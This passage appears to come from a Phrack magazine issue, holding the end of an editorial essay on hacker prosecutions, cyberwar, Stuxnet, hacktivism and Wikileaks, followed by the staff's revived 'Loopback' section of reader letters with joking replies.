of everything else! Once again, this is solid proof that God is indeed on 
the side of the just.

* Albert 'soupnazi' Gonzales -- the sole failure here, scoring miserably 
by still receiving a massive twenty-year sentence despite having 
implicated everyone he knew up to and including his own grandmother

-- and that's just for starters.

The most disconcerting element in the entire show so far for anyone in any 
way involved in any sort of criminal activity (or, indeed, anyone who 
involves themselves in anything anywhere near anything resembling criminal 
activity), is the startling comaraderie and friendly interaction between 
international agencies - particularly Interpol and the FBI. Especially the 
FBI.

Recent international busts involving novel interaction between agencies 
has lent heavy weight to previously unfounded concerns of privacy 
advocates. The mere idea of a foreign national's being arrested overseas 
and renditioned/transferred to the custody of American civilian agencies 
purely on the basis of American testimony and evidence is enough to turn 
the stomachs of anyone, and yet it seems to have gone largely under the 
radar -- especially among American Citizens. 

The pseudo-criminal actions necessitated by the various agencies involved 
in order to bring down Gonzales would stagger even the most ardent 
Republican waterboarder. To wit, the hard drives belonging to Ukrainian 
carder Maksym 'Maksik' Yastremskiy were cloned during his trip to Dubai 
and yet again when he was coerced into visiting someone in Turkey (all the 
while while US agencies tried to tote the party line that they caught him 
while he was taking "vacation" -- conveniently ignoring the fact that they 
lured him to visit) and his movements tracked throughout Europe and Asia 
over an extended period of time. We can be sure that Interpol had not the 
gumption nor Ukrainian officials the interest (or resources) to bring 
about this level of interplay. With the evidence in hand, surely only the 
FBI can be to blame? The Turkish officials got to crow about a 30 year 
prison sentence -- in a Turkish prison, no less -- and the US got to cross 
one more name off their "to do" list, case closed, job done -- success all 
around.                                       

Further confirmation of such a hearty and hale level of cooperation was 
provided just this past October by the FBI, who affirmed that the break-up 
of a major Zeus botnet ring was the result of an "unprecedented" 
partnership between the FBI and police forces around the world including 
the UK's Metropolitan Police, the Security Service of Ukraine (SBU) and 
the Netherlands Police Agency. So far the international Operation Trident 
Breach effort has yielded more than 150 arrests across the US, the UK and 
Ukraine, the FBI said. One can assume that's only "so far" and that once 
the narq ball gets rolling, yet more waves of arrests -- and yet more 
international cooperation -- will commence in earnest.

Perhaps you are wondering what this has to do with you, at this point. 
Perhaps you ARE merely doing your job as a whitehat, researching these 
transglobal "criminal conspiracies", reversing malware, sticking to only 
machines you have permission to access, maybe even contributing to some 
open source projects and communicating giddily about 0day bugs on bugtraq 
and full-disclosure, or releasing exploit information on your twitter 
feed; after all, in this wired global age, the opportunities for 
collaboration are indeed unprecedented. But where does one's level of 
responsibility for the use of one's research end and begin? Dig Sklyarov 
and the DMCA brouhaha. Witness certain unnamed Linux distros suddenly 
being unwilling to allow tools such as SQL Ninja to be included in their 
source code repositories.

At what point might YOUR code be considered a munition? At what point 
might your totally legitimate work as a whitehat (or greyhat, or what have 
you) researcher, or pentester, or even systems administrator or website 
developer be called into question? While it is certainly difficult to 
argue that putting identity thieves behind bars is a quote-unquote "bad 
thing", it is also difficult to refute that code itself is being seen as a 
munition (just as crypto was not so long ago, and probably will be 
increasingly so again, as time passes and the reins tighten up in only 
somewhat predictable ways).

If you mistakenly introduce an error into your codebase at work and it 
creates a security hole, can you prove it was not intentional? There 
really are no guarantees. An overly aggressive legal system will at the 
very least threaten to steal time, money, resources, and quite probably 
your reputation. 

If you're very unlucky you might wind up in jail, or in trouble for 
something someone you know was involved in, in hopes that you will be the 
next hacker willing to daub in his (or her) mates to be set free, thus 
maintaining the cycle of narqing and providing an always-revolving door of 
the Usual Suspects to lay blame to. That's not even including the Patriot 
Act and wiretaps (an issue pretty much deserving of its own article some 
other time). 

The exposure of Google's Street View Wifi data gathering fiasco is likely 
only the tip of the iceberg -- what we were told was the accidental coding 
error of a single engineer (who probably will wear that virtual scarlet 
letter on his resume for life). And yet again, in that case, other 
countries were first to protest; only lately has there been a strange and 
questionable desire TO have those records retained -- for what purpose who 
only knows.

The question to wrap all of this up with, here, probably isn't "Does it 
affect you now?" (unless you are indeed a blackhat, in which case, no 
doubt, this will impact you tremendously). The question is "can you be 
sure it never will?"


--[ 2. Stuxnet, Cyberwar, Hacktivism and Political Hacking

It's no secret that, with the US economy in a state of planned poverty, 
conventional sense.  But the growing speculation, that Iran's nuclear 
power plant at Bushehr will turn into a weapons program, is a timely 
excuse for governments to exercise their newfound cyber warfare tactics.  
Iran believes Stuxnet was intended to derail its nuclear ambitions; and 
"analysts" expect us to believe that a string of numbers, the name of some 
shrubbery, futbol domains, and weird 2012 shit... somehow indicates Israel 
was behind it all.  The reality is probably this: as much as Israel's 
super star hacking squads would love to take down Bushehr, Russia is 
standing in the way, defending its plan for a return on investment.

Stuxnet represents just one of a few big events in this arena since last 
issue. We've also had Aurora and that whole Google scandal in China.  
Hildawg has been bitching about China from the start, and it came as no 
surprise that pressure would be put to bear on big companies, like Google, 
to defame China's government in the midst of a GFC.  More recently, 
Europe's cyberwar simulation has been hailed as a success, with countries 
across the EU learning to defend against over 300 attacks.  This marks 
another milestone in the EU's attempt at coordinating intraregional 
cybercrime investigations.  Across the Atlantic, USCYBERCOM has finally 
gone live.  While governments prefer to keep their military hax a secret, 
there exists a necessity for them to demonstrate their power.  Welcome to 
a whole new wave of terror, hackers.

The majority of high profile attacks in the last year show a trend towards 
highly skilled and targeted hacks that take a lot of time and/or money to 
develop.  In these cases there is minimal collateral damage, months may 
pass before detection, the hackers are anonymous, and the vector is 
unique.  While these are still large-scale attacks, they're not intended 
to affect the entire internet -- just a select few major players, and 
sometimes only for a short while.  As corporations and governments throw 
big bucks into cyber warfare we're going to start to see some of the big 
names in the IT industry get left behind.

The continued DDoS of Burma, in the lead-up to its first election in over 
20 years, showed a recent and unwelcome return to stupidity and ignorance 
at a rate of 10-15gbps, easily dwarfing the Estonia DDoS of 2008.  Amnesty 
International had been working hard to get radios into Burma, so that 
people could keep up with the election news from across the border.  Days 
after the election, their Hong Kong website was compromised and visitors 
were attacked with an IE exploit that Microsoft knew about, but blatantly 
refused to patch early.

On the same day that the Burma DDoS began, the Iranian Cyber Army 
announced its "botnet for hire", though it is rather unlikely that there 
is a substantial link between the two.  Their admin system is some kind of 
honeypot, their stats are fake, and surely the very idea should have 
screamed of an obvious trap.  But as the news started to spread, bloggers 
began recycling news media, and slower reporters started relying on those 
bloggers, until we started coming across reports that ICA was renting out 
"the same botnets that took down Twitter and Baidu".  Uh, sorry?  Last 
time I checked, social engineering a dude at Register.com didn't require a 
botnet.  

But hey, maybe there is a botnet, or at least one in development.  It's 
hardly as though ICA are the first to do so.  But their treatment by news 
media is ridiculous.  I mean, if these guys really are an "army" then just 
where were they when Honker struck out in retaliation for Baidu's 
defacement earlier this year?  Unfortunately the media still clings to 
them because of a handful of high profile defacements.  And because they 
tend to pop up every time something big happens, some journalists actually 
think these kids are an officially sanctioned military force that reports 
to Ahmadinejad himself!  I don't believe, for a second, that they're even 
Iranian to begin with.

On the related note of poor-man's hacking, we're also seeing a rise in 
grassroots hacktivism.  Social networking sites are making it increasingly 
easy to inspire angry mobs of ordinary computer users to take part in a 
DDoS by clicking a link.  Years ago we laughed at those kinds of methods 
(remember the cDc's hacktivismo?).  But we're not on dialup anymore, and 
there's not a lot you need to get your own "human-net" started -- just a 
persuasive cause and a handful of idiot-proof programs.  LOIC is popular 
for this, as are websites that send GET requests in iframes over and over 
and over.  Next thing you know, there's thousands upon thousands of stupid 
tweeters, staggering forth like something out of Resident Evil.  This 
isn't even including the more normal botnets that use sites rely on 
Twitter for commands.  Throw that into the mix and Twitter becomes some 
kind of pluralistic middle-class pseudo-political force to be reckoned 
with.  Law enforcement seem to just give up in those cases.  Too many 
people to chase.  Not enough resources to prosecute them all.  The most we 
see is the instigators of these human-nets being hunted down.  As the RIAA 
and MPAA attacks showed us, Anonymous ain't so anonymous when they plan 
their attacks in the open, in front of feds, on 4chan and Darknet.

The trend toward military-directed cyber attacks is prompting some 
academics to call for a change to the laws that regulate the conduct of 
hostilities in war.  They are questioning whether a country can remain 
neutral in a cyber war if the data carrying the attack travels along that 
country's pipelines.  Some militaries insist that for hackers to qualify 
for "prisoner of war" status, these geeks must wear a special hacker 
uniform and carry a sidearm (I like to think this uniform would look like 
TRON Guy).  

And then there's the question of whether something like Stuxnet can be a 
legal impetus for conventional war.  The real beauty of Stuxnet isn't just 
in the code (as specialised and 0-day as it may have been) -- it's also in 
the attack vector.  If you conveniently lose your malicious USB key in a 
parking lot, and some "unscrupulous person" picks it up and decides to use 
it at work... YOU are not committing an attack -- at least not directly 
(one could argue, after all, that they had no business picking up the usb 
key in the first place).  Moreover, philosophical arguments aside, if 
you're a civilian, the likelihood of you being charged with anything is 
extremely remote. Add all of this to the essential argument that hacking 
cannot be considered an act of war necessitating self-defense unless the 
hack can be compared to a substantive and conventional military attack, 
and conventional arguments are essentially thrown out the window. In other 
words, in the case of Stuxnet, while Iran recognises there was espionage, 
and possibly an intentional attack, the worm was not an "armed attack" 
sufficient to qualify self-defense under the UN Charter.

In sum, if the events occurring since the last issue has been anything to 
go by, the next decade will see a growing disparity between the nature of 
high-profile hacks, but at the end of the day the bulk of it is the same 
old same old, with some new shit thrown in.  Militaries are fast becoming 
a cyber-force to be reckoned with, but in the absence of laws to regulate 
their actions, don't expect bombs to fall as a result.  While it is most 
probably that the recent spate of uniquely targeted high-profile attacks 
will go unpunished, what we can expect is the government to play an 
increasing role in regulating the Internet and hunting down ordinary 
hackers in the name of a "war on cyber terrorism".


--[ 3. Wikileaks and whistleblowing 

But what of Wikileaks? While it is undeniable that it has had some impact, 
one must ask oneself if we are not just raucously accepting as a date to 
the prom the only girl who asked us out and considering ourselves lucky to 
have found anyone at all. One could argue that when a society needs a 
hero, someone will always be willing to show up fighting, but the same 
could be said of most movements, even including the upstart 'Tea Party' 
being cawed about on Fox News to cheers by the same people who would have 
voted for Obama if they'd been Democrats instead of Republicans. Perhaps 
it's unfair to tilt this article so specifically in the direction of the 
US -- after all, Wikileaks has shed some light on some tremendously 
important stories in the three or four years since its inception -- but 
it's hard to argue that 2010 was the year that Wikileaks came to true 
nation-wide attention, due in no small part to a certain "redacted" video 
going by the sobriquet "Collateral Damage", and then fueled by the 
document dumps ostensibly leaked by US insiders concerning Iraq and 
Afghanistan that came not long thereafter.

Yes, we have a responsibility to make information acceessible, or at least 
make the knowledge of how such information is stored and used more public, 
less draconian and redolent of a country poised to curtsy/bow to 'Mein 
Fuhrer' but we also have a responsibility to treat that information with 
respect, and more importantly to be able and willing to filter that data 
through the sieve of common sense and reason: Data should be valuable 
because it is valuable data (and in some cases the releases by Wikileaks 
have indeed been valuable data) and not valuable simply by the reasoning 
that "they don't want us to have it." 

By the same token, sometimes the very act of sticking the proverbial 
middle finger up at The Man serves as a call to arms -- or at the very 
least a rate limiter: A way to urge the current Powers That Be to think a 
little more before trying to instituting even further privacy eroding 
measures. Conversely, it is all too easy for any country to consider any 
"leak" -- righteously whistleblowing or not -- as an act of war, or an 
excuse to add a few zeros to a department's line budget.

And there's something else we all need to be thinking about:

Every country, every war, every movement has secrets. We may tell 
ourselves that information wants to be free, but freedom comes with a 
price and some secrets are GOOD secrets. More importantly there OUGHT to 
be some secrets in the world.

To completely submit to Wikileaks' vision is almost more akin to Big 
Brother than anything the US government -- or any other government -- 
could possible create on its own: A culture where your every move may be 
exposed, your every thought may be tallied, your every minutiae published 
for the whole world to see, in a world where Google gambols giddily in the 
grasses of greed and Facebook and Twitter announce to the world your every 
move to a perceived audience of enthralled onlookers all willing to say 
'you!' when you say 'ah, me!'. In a way we're already most of the way 
there, and that's a very dangerous thing. When your baseline gets reset 
and you don't REALIZE that your privacy is being invaded, then the great 
big "They" has already won -- and you have just let yourself do the dirty 
work for Them.

One could argue that if PFC Manning did indeed leak what has been 
attributed to him, he may have done a heroic thing, but the fact that he 
may have also broken a trust that he covenanted into in advance with the 
US government is difficult to completely discount. The Manning case having 
received the attention it has gotten this year has brought up a lot of 
grey areas in peoples' political belief systems, but it has also begged 
the question: What *is* "whistleblowing" and what is "disloyalty"? What is 
"patriotism" and what is "narqing"? When can one trust one's judgment 
about another person's true intentions and is it truly as cut-and-dry as 
we all wish it would be? Adrian Lamo snitched, but it is always possible 
that he thought he was protecting himself or his country even as he may 
have also been trying to cobble together some newfound publicity for a 
receding career that has been inarguably past its prime for years now. At 
some level this isn't about government or whistleblowing or privacy -- 
it's about society and about interpersonal trust, and perhaps that is 
where things get the murkiest. Naive or not, trust is dealt out 
increasingly to total strangers on the internet. One could argue that 
Manning, if indeed that was Manning, was naive in trusting a veritable 
stranger, but most of us do this on a regular basis now; the difference 
here is, Manning paid.

Without an explicit agreement of nondisclosure one cannot truly and 
totally scorn somebody for "squealing", but by the same token our very 
society has been built up on such simple and implicit bonds of trust: I 
will not hurt you, I will not steal from you, I will not betray you. I may 
not agree with what you do, but I respect your choices as an individual. 
At what point does that trust need to be broken off? Some secrets are 
good, if they contribute to the greater good of society -- and that goes 
*both* ways -- at times in favour of the individual, at other times in 
favour of government. As a species we always want to root for the Underdog 
(and nowhere is this more true than the US, perhaps), but given the fast 
fluxing nature of the Internet, who the Underdog is can flip at a second's 
notice: At first Wikileaks was the cause celebre of people everywhere, 
then came the backlash. All movements have backlashes, and Wikileaks was 
bound to not be the exception.

Perhaps one reason so many scorn Wikileaks has to do with the closed-book 
nature of a site so overtly and devoutly espousing transparency; at some 
point it becomes difficult not to interpret all sides as playing with 
similar playbooks. But it's difficult to win at poker at a table where 
everybody knows your cards, especially when the rest of the players have 
bankrolls that far eclipse your own. Again, the question arises: When is 
transparency necessary, and when is secrecy a requirement to make any 
progress at all? On the one hand, one must worry about too much 
transparency; on the other hand, one must worry about too much lurking in 
the shadows. In the past we had journalists to expose corruption; now it 
is often journalists themselves fighting off corruption charges, hiding 
facts, skewing evidence.

It's incredibly difficult to deny that some transparency, and indeed 
Wikileaks itself, can have a positive impact -- and it's hard to imagine a 
world where SOME sunshine shouldn't be shed; The trick here is to remember 
that such increased levels of exposure demand we be a more responsible, 
measured animal -- something as homo sapiens we have really never learned 
how to do or be. 

There is no way to shove the genie back into the bottle, and old rumours 
on the Internet never really die -- they just get archived til someone 
else manages to come along and dig them up from their temporary graves. 
This holds great promise for the future of integrity, but it also creates 
issues when the possibility of outright falsehoods are introduced, 
especially through an anonymous third party, or in cases where a split 
exists between haves and have-nots; who really has time to monitor their 
reputation online to that level? And if someone does besmirch your name, 
what can be done?

If your data shows up on a whistleblower site care of a third party, then 
it also becomes yet another way to show a display of power: The 
Vice-Presidential hopeful breaks the rules -- nay, the law -- and walks 
free while the college student who guesses at her password gets sentenced 
to a year of supervision or prison. If there is to be light shed, then it 
should be an equally penetrating (and perhaps softer) light -- not a light 
meant to shine in the victims' faces and hide the face of the perpetrators 
-- especially when the label of 'victim' and 'perpetrator' is so murky and 
grey (as in the Palin case; one could argue both sides committed some form 
of fault).

Julian Assange likes to say 'speak truth to power" but this is a tall 
order; to first be able to speak ANYTHING to power, you must basically 
gain the ear of the powerful, or you just get thrown
into an eddy, left to whirl around with a bunch of kooks and nutjobs (as 
any federal agent handling walk-ins will likely attest to, and too, so 
must whistleblowing sites contend with; with fame
comes your own raft of nutjobs to weed out).

It'd be hard to deny that whatever else Wikileaks has accomplished in the 
past year, it has gotten someone's attention. Whether that will be a good 
thing or a bad thing remains to be seen... But one imagines any call to 
arms must bring about some force for good, even if that force is something 
as simple as a renewed spirit of vigour and willingness to be involved 
among an otherwise sluggish populace juggling its own sense of 
powerlessness in a country demanding what essentially constitutes sexual 
assault merely in order to board an airplane. To make an omelet you must 
first break some eggs; To create a change you must first gain the ear of 
not just power but the people itself -- and then you must charge them with 
the duty to act.

The true collateral damage may wind up being Manning himself, here; 
basically judged guilty already, his name forever stored, his 
acquaintances being hassled, his personal life bared open to the
 world, he serves as both an example of what to strive for and a 
cautionary tale for a new age. What the future holds for him remains to be 
seen, but with any luck he will receive a fair trial by a jury of his 
peers -- if any such people even exist.

Wikileaks may not be perfect -- in fact, it may be deeply flawed -- but 
for now it's probably all we're going to get. And we should probably be 
grateful for it -- but wary. Always wary. The danger of mixing the message 
up with the messenger is always great, and there is no real way for any 
whistleblowing site to always be 100% correct. Even governments have an 
incredible amount of difficulty verifying the veracity of any information 
or separating rumours from fact; to put this level of blind trust in a 
volunteer organization with no oversight is bound to be fraught with a 
whole host of issues we haven't seen the likes of yet... For instance, 
what happens when a non-governmental entity views it as a potential source 
of information? Once any whistleblowing site gets information, it is out 
there; what is done is done; At this point, false flags and disinformation 
is also an issue; the possibility of tricking any whistleblower site to 
publish false information would destroy not only its credibility if found 
out but possibly be used to forward some governmental or non-governmental 
party or agenda. Additionally, to believe everything that any organization 
says is as short-sighted as believing everything your government tells you.

Ultimately your conscience will have to be your guide -- and likely no two 
consciences will ever completely agree, especially about anything as 
at-times agit prop as Wikileaks can be, or as secretive as governments 
have always been.


--[ 4. Scene Events: the Final Word

To be sure, many other events have taken place this past year and a half 
(the whitehat-vs-blackhat wars forever raging (cue zf05 and the 
never-ending arguments about disclosure-vs-nondisclosure); the global 
emergence of a harsher, more organized form of cybercrime (and the many 
busts that resulted);  etc, etc), but several basic themes emerge: There 
has been fraud -- but there has always been fraud. There have been 
invasions of privacy -- but there have always been invasions of privacy. 
There have be governments overstepping their bounds -- but there have 
always been governments overstepping their bounds. That doesn't make any 
of it acceptable, but it also doesn't make any of it new -- nor does it 
give any of us an excuse to pretend it has nothing to do with us (no 
matter where you reside or what flag you fly (or choose not to fly, 
whatever the case may be)). If anything, there has been an amplification 
of all of the above, but none of it is truly 'new'. Read past issues of 
Phrack: All of the above has existed in some form or another, just on a 
smaller scale. It's still existed.

Judging by the drive for wealth or fame or infamy displayed in so many of 
this year's stories, it bears mentioning that we cannot let a few key 
players make us forget how important it is to treat technology 
responsibly, reasonably -- to love it, to hack it, to, please, take risks, 
but to do so with heart

-- with CONSCIENCE --.

In the end it all starts and ends with you.

[EOF]





--------------------------------------------------------------------------------


                              ==Phrack Inc.==

               Volume 0x0e, Issue 0x43, Phile #0x04 of 0x10

|=-----------------------------------------------------------------------=|
|=------------------------=[  L O O P B A C K  ]=------------------------=|
|=-----------------------------------------------------------------------=|
|=-------------------------=[  Phrack Staff  ]=--------------------------=|
|=-----------------------------------------------------------------------=|


    Hi there!

As you may have noticed, the Loopback tradition had been lost for years. 
The previous staff decided to remove it as it was a little bit hum... let's
say 'teasing' ;>

Can you remember Duvel's remark on that fact?

A brief history of the Underground scene (p64):

                                    ---
Take a look at the Phrack Loopback responses during the first 10 years
to the recent ones. A much higher percentage of responses are along the
lines of `you're an idiot, we at Phrack Staff are much smarter than 
you.`...
                                    ---

Well good news folks, it's back. We chose to resuscitate it as:
    - it's fun. YES IT IS (especially considering the fact that people
      were not aware of its coming back)
    - we promise not to be too much of bitches (or so they hope) ;>
    - we want YOU to share with the Underground. As such for the next issue
      you are very welcome to send us mails of all kind
    - we are poor on philes for this issue (just kidding BTW, we're just
      elitist arrogant bastards)

We humbly apologize to all guys we never answered to neither by mail nor 
through this phile because we suck at filtering our spam (this could
_absolutely_ not be a laziness issue, right?)

Time to find out who wanted to say hello.

    -- The Phrack Staff


|--=[ 0x00 - From India ]=-----------------------------------------------=|

Subject: Re: Null Conference and Security Community
From: Prashant KV <bug@null.co.in> 
Cc: Marketing <marketing@null.co.in> 

    [ Marketing? :> ]

Hi,

    [ Hi Prashant ]

[...]

Null is a community of enthusiastic hackers and security professionals in
India. It all started with a motive to promote advance security research in
India. 
 
Null has immensely contributed in nurturing young hackers and providing a
platform to amateurs. Over the years, the Indian industry and several
government organizations have benefited from the expertise of Null members.
Be it creating awareness among Indian developers or defending Indian 
Infrastructure, Null members are everywhere. 
 
As a part of continued efforts in creating awareness among our enthusiasts,
Null conducts an annual conference in carnival city of Goa called Nullcon. 
Hackers, talks, workshops, party and booze invites you, 25-26th feb 2011 
Goa India.

   [ Thanks to the Null members, we have an interesting paper on the Indian
     hacking scene. Kudos. Please have a look at their websites:

     http://null.co.in / http://nullcon.net/cfp-nullcon-dwitiya (CFP)
   ]
 
Regards
Prashant 

|--=[ 0x01 - Th1nkG33k ]=------------------------------------------------=|

Subject: Legion of Doom T
From: Ted Mosby

    [ Hi Ted. Is Barney with you? ]

Is this shirt still available? I know it's from the early 90s, but I had 
one of these and I've always wanted to get another.

(For a limited time, the original is back!)

"LEGION OF DOOM  --  INTERNET WORLD TOUR"

The front of this classic shirt displays "Legion of Doom Internet World 
Tour" as well as a sword and telephone intersecting the planet earth, 
skull-and-crossbones style. The back displays the words "Hacking for Jesus"
as well as a substantial list of "tour-stops" (Internet sites) and a quote 
from Aleister Crowley.

    [ Dammit. We didn't even know it existed. Sorry bro, no clues on this 
      one. ]


|--=[ 0x02 - Drug abuse is bad ]=----------------------------------------=|

Subject: Binary is Hacked!!!
From: killerzerosones@null.net

555555555 55 5555 55 55555555 55555555 55 55
55 555 55 55 55 55 55 55 55 55 55 55
55 5555 55 55 55 55 55 55 55 55 55 55
55 555 55 55 55 55 55 55 55 55 55 55
555555555 55 55 55 55 55555555 55555555 555555
55 555 55 55 55 55 55 55 555 55
55 5555 55 55 55 55 55 55 55 55 55
55 555 55 55 55 55 55 55 55 555 55
555555555 55 55 5555 55 55 55 5555 55
55 555555555 55 55 55555555 55555555 55 55555 55555555 55555555
55 55 55 55 55 55 55 55 55 5555 55 55 55
55 55 55 55 55 55 55 55 55 555 55 55 55
55 55 55 55 55 55 55 55 55 55 55 55 55
55 555555555 55555555 55555555 55 555 55555555 55 55
55 55 55 55 55 55 55 55 55 55 55 55 55
55 55 55 55 55 55 55 55 55 555 55 55 55
55 55 55 55 55 55 55 55 55 5555 55 55 55
55 555555555 55 55 55 55 55555555 55 55555 55555555 555555555

Binary is setup as 0's and 1's and there are quite a few encodings that 
beat binary(machine language)...
256 128 64 32 16 8 4 2 1
0 = .
1 = .5 = 2 = 1
1 0 = 5
1 1 = 5.5 = 52 = 26 = 13
1 0 0 = 50 = 25
1 0 1 = 50.5 = 502 = 251
1 1 0 = 55
1 1 1 = 55.5 = 552 = 69
1 0 0 0 = 500 = 250 = 125
1 0 0 1 = 500.5 = 5002 = 2501
1 0 1 0 = 505
1 0 1 1 = 505.5 = 5052 = 2526
1 1 0 0 = 550 = 275
1 1 0 1 = 550.5 = 5502 = 2751

When .5 is replaced with 2 keep halving number until prime without turning
number into a decimal for a faster encoding with the 0-9 numeral system. So
basically half all the numbers until the next half becomes a decimal I.e. 
being prime. This saves in space approximately 98 numerals per 100 places 
compared to machines language.

    [ Same post was found on: 
      http://mathfax.com/emraised-to-the-infinite-9craised-to-the-infinte-9
      and
      http://www.mymathforum.com/viewtopic.php?f=13&t=12988
    
      You're crazy man :> Well this give us the hint that at least one guy 
      is reading our drug-related papers. ]


|--=[ 0x03 - Dating ]=---------------------------------------------------=|

Subject: CFP 67 and staff
From: Larry

Hello,

Is there any place where I can talk to the staff, like it used to be in the
past?

Is the old IRC still working?

    [ Unfortunately it's not. But rumor says we may be found on other IRCs.
      If you know a guy who knows a guy who knows a guy then maybe... ]

Regards.


|--=[ 0x04 - Interesting thoughts ]=-------------------------------------=|

Subject: ANTISPAM
From: Rachel Peek <rachelpeek@live.com>

    [ We sent you a mail Rachel. Having no answers, we assumed we could 
      publish it as it currently is. ]

Normally I would try to be convincing, but I'm not feeling it right now. 
The thing is, I recently wrote a sort of article on my personal opinions 
about the government. I don't really know if it's the kind of thing you're 
looking for, but I figured I would send it in anyway. Look down.

The thing with mental disorders is you never know if what you're feeling is
real. You don't know if you've made it all up in your head, if you just 
added all this stress into your life for nothing. But it feels real. As 
real as anything can, and it's scary as shit. It raises the questions: 
Which part of the brain is in charge of sanity? Or the more often times 
more prominent insanity? What causes us to say the things we say? What 
tells us to hurt the ones we hurt? What compels us to take the actions we 
take? WHY DO WE DO THE THINGS WE DO? This question has yet to be answered 
after all of these years. I think it's because we're too busy telling each 
other what to do, and now our heads are lost up the parts of our asses 
where maps aren't allowed. I am living proof of this stupidity. I don't 
know where my thoughts come from. I just know they're there and continue to
taunt me with their daily attendance. They will cause me to do things that 
will make others wonder. They will ask the inevitable question "Why?" I've 
just stopped answering. This is because my answer will never be good 
enough. I never seem to have the appropriate reasoning for my actions. For 
lack of a few better words, I just do shit. I do what I want. In today's 
society, this is a crime. In order to become a model citizen of the proud
U.S.A., you must never, ever do what you want to do. You are to do what you
are told and ask no questions. Not that it matters. You'll only be answered
with bullshit about how it will benefit you in the end. Take your 
modern-day education program for example. they provide you with a selection
of subjects to choose from, all of which have been watered down by the 
government to shield our innocent eyes from our country's mistakes and the 
fact that the world is a shitty place thanks to our existence. This is not 
easily done though, so they must distract us with ridiculous 
extracurricular activities that will be of no use to us ever in our lives. 
And they know it. So while we're busy learning how not to break an 
unfertilized chicken ova with a sharpee face, they're watching us. They ask
themselves,

"How will they react to this?" 

"What will happen if we do that?"

They're searching for glitches, just like you would on a computer. You make
one wrong move, you take the tiniest step out of line, and they'll 
immediately make an attempt to "correct" it. How dare you be your own 
person? How dare you make your own decisions? You must fit the mold, and if
you don't, you better believe they're trying their damnedest to shove you 
into it. They want to catch us early you see. Before we realize how to 
think for ourselves. They tells us how to walk, stand, eat, sit, write, 
sing, THINK. And we eat the shit up. Why is this? Because if we don't, we 
are shunned. We are not like the others. We are alone. The "Man" depends on
our loneliness. The homosapien hates to be alone, and they are aware of 
this. Most people will do anything to avoid it, including shutting off 
their brains to fit in. So you fall in line and you follow these rules. You
might ask why they are there at all, but you will never be answered. You 
will simply be given an ultimatum. "To get a good job and be successful" 
Another way to put this would be, "Do exactly what you're ordered to or 
have a miserable life" But success is relevant...to some at least. 
Society's definition of success is money. You go to school to get a job to 
make money to spend money to run out and need it again. You get trapped in 
the cycle. Well what if your definition of success is happiness? You've 
most likely thought to yourself, "Oh shit" This is due to the fact that you
now know you are living in a world you don't belong in. You are living in a
world where happiness IS money, and no one will believe otherwise. And so 
you need money to get by. You have to delicately touch the filthy stuff. 
You have to carry it tenderly in your pocket, making sure it's in a safe 
place, meeting all of it's needs, caring for this shit with wasted love. 
And you get a job to acquire more. You get up every morning and you follow 
the speed limit up the road, and you buy your coffee that is made from 
beans picked by people who can't afford to taste it, and you walk into a 
building with big, clean windows and detailed columns cleverly placed to 
disguise the boredom that awaits you inside. You will sit. And you will 
sit. You will sit all day long in one of those swivel chairs that allow you
to do your pointless work at a slightly quicker pace by cutting out all of 
that rigorous head turning. You do this because you want to get out of 
there as soon as possible. You want to go home and eat your feelings. You 
want to stare at that black box as it tells you you are ugly. You are 
stupid. You are fat. You are not good enough. You are not the best. Be the 
fucking best. But you can't be. You never will be. You don't have time. 
You're so busy following that same goddamn schedule every day you don't 
have a single second to breathe and it's cutting the circulation off to 
your brain. You can only think what you've been taught to think and you'll
do so until you're on your deathbed trying to reflect on the life you led. 
Trying to remember something beautiful the way they do in the movies. But 
all you see are white button-downs and digital clock numbers, glowing 
computer screens and stock numbers. you have wasted your life and you might
as well be a cardboard cut-out of yourself. It's a sad thing to die a human
being.

    [ Thanks for this Rachel. ]

|--=[ 0x05 - Translation proposal ]=-------------------------------------=|

Subject: Translation of phrack magazine 
From: Robert Langdon <langdonmail@gmail.com>

    [ Audrey Tautou <3 ]

Hi Phrack staff,

I'm an italian university student of Computer Science. I read many article  
of your magazine and I'm vary interesting about your magazine.

In this days, I think if is possible to translate your articles (not all
obviously) in italian language ... and I don't understand which is the  
distribution or publish license of yours article. The intent is to spread   
your knowledge to italian guys. Can I translate one or more article?
Obviously, the translation is one-to-one, with the same references, the same
authors and so on.

    [ As stated many times we do not support officially translations of 
      Phrack and that would be essentially because translations (even from 
      talented people) are not accurate enough. However, you're free to 
      translate any article. Good luck :) ]

Thanks for your great work.
SuperMrPlusPlus

    [ I'm confused. I thought you were Robert Langdon. ]


|--=[ 0x06 - Alcohol abuse ]=--------------------------------------------=|

From: Anonymous <nobody@remailer.paranoici.org> 
Subject: The risks of alcohol and being drunken bastards

Drinking Alcohol and Cancer Risk
www2.potsdam.edu/hansondj/HealthIssues/1109728149.html  

Alcohol - The Risks | Health | BBC World Service
www.bbc.co.uk/worldservice/sci_tech/features/health/healthyliving/
alcoholrisk.shtml 

Alcohol - Risks 
www.pamf.org/teen/risk/alcohol/risks.html   

4.5 The risks of alcohol
www.drugtext.org/library/books/raterisks/4.5.htm

Effects & risks of alcohol - Schoolies Week 
schoolies.youthcentral.vic.gov.au/Safe+Partying/Alcohol/Effects+&+risks+of+
alcohol/ 

Underage Drinking-Why Do Adolescents Drink, What Are the Risks ...  
pubs.niaaa.nih.gov/publications/aa67/aa67.htm   

Young people and alcohol - what are the risks? : Directgov - Parents
www.direct.gov.uk/en/Parents/Yourchildshealthandsafety/
Youngpeopleandalcohol/DG_183848  

Drinking and alcohol - Live Well - NHS Choices  
www.nhs.uk/Livewell/alcohol/Pages/Alcoholhome.aspx  

 Alcohol and depression: What are the risks? - MayoClinic.com   
www.mayoclinic.com/health/alcohol-and-depression/MY01078

Health risks associated with alcohol and heavy drinking 
www.drinking.nhs.uk/health-risk/

The Risks of Developing a Drug or Alcohol Dependency
www.egetgoing.com/drug_addiction/addiction_risk.asp 

Alcohol - Alcohol   
www.alcohol.gov.au/ 

Alcohol Health Risks - Alcohol & Other Drugs, The Wellness Center ...   
www.uncg.edu/shs/wellness/aod/alcoholhealth/

Teenage binge drinking, effects of alcohol, facts about alcohol at ...  
ncadi.samhsa.gov/govpubs/ph323/ 

Health Risks of Alcohol and Drug Abuse  
alcoholism.about.com/od/effect/u/Risks.htm  

Health Risks In Alcohol Abuse   
ezinearticles.com/?Health-Risks-In-Alcohol-Abuse&id=301753  

For Teens: Know the Risks of Alcohol | HealthSheets | Wellness ...  
www.mountnittany.org/wellness-library/healthsheets/documents?ID=3684

Alcohol and Breast Cancer Risk: New Findings - National Cancer ...  
www.cancer.gov/cancertopics/causes/breast/alcoholuse0408

